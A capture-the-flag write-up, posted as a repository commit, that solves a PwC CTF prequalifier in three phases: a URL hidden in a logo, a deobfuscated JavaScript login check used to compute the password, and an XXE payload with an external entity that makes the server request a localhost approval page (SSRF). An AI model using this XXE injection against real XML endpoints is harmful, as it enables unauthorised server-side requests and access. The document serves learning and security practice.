Commit cda57fe7 authored by Cool Fire (HN)'s avatar Cool Fire (HN)

Initial commit

parents
# Phase 1
The logo contains the text which contains the URL for the next phase. We just need to search/replace out the `PwC-` blocks and extra `-` characters to get the URL we need; `https://prequal.pwctf.com/login.php?uid=32177e59ac87d481b8ad10a69c811537`.
# Phase 2
Protip: tell chrome to ignore that one breakpoint that triggers every second.
There is an obfuscated JS section at the end of a JS file, let Firefox scratchpad run it and print the result with `console.log()` to get this deobfuscated function:
```
function login() {
var key = "i want to win the pwctf!";
var uid = document.location.search.split('=')[1];
var username = document.getElementsByName('username')[0].value;
var password = document.getElementsByName('password')[0].value;
var value = [];
for (var i = 0; i < uid.length; i++) {
var charCode = uid.charCodeAt(i);
for (var j = 0; j < key.length; j++) {
charCode ^= key.charCodeAt(j);
}
charCode ^= i;
value.push(charCode);
}
if (username === "PwCTF" && password === btoa(value.map(String.fromCharCode).join(""))) {
window.location.replace("/register.php?token=" + md5(password.split("").reverse().join("")));
}
}
```
Then simplify the code down a little and stick your uid in it to calculate and print the correct pass:
```
var key = 'i want to win the pwctf!';
var uid = '32177e59ac87d481b8ad10a69c811537';
var value = [
];
for (var i = 0; i < uid.length; i++) {
var charCode = uid.charCodeAt(i);
for (var j = 0; j < key.length; j++) {
charCode ^= key.charCodeAt(j);
}
charCode ^= i;
value.push(charCode);
}
console.log(btoa(value.map(String.fromCharCode).join("")));
```
Shows the password to use in your console; `ZAAAOAEAMwIAMwMANQQAPQUAYAYAYwcAaggAOwkAbAoAPgsAbQwAPg0APg4Aaw8AIRAAIREAKxIAIBMAIBQAJRUAdRYAIRcALRgAfRkAexoALxsAJRwAeR0AKR4ALR8A`.
The username should obviously be `PwCTF`.
# Phase 3
The registration page sends XML data in a POST request, we can use XXE and a remote dtd to get the XML parser to make an http request from localhost, to localhost on our behalf.
replay the request through burp with the XXE included:
```
<?xml version="1.0" ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY sp SYSTEM "http://localhost/approve.php?session=s%253Ae2Efka7vpc4DUXWg5MsXft21xgkAvYGM.EFMK13ksf8irpWSMkZk3bcwWL4URZLZnytaBPeZbrv8">]><user><name>cFire</name><email>coolfire@insomnia247.nl</email></user><r>&sp;</r>
```
Markdown is supported
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment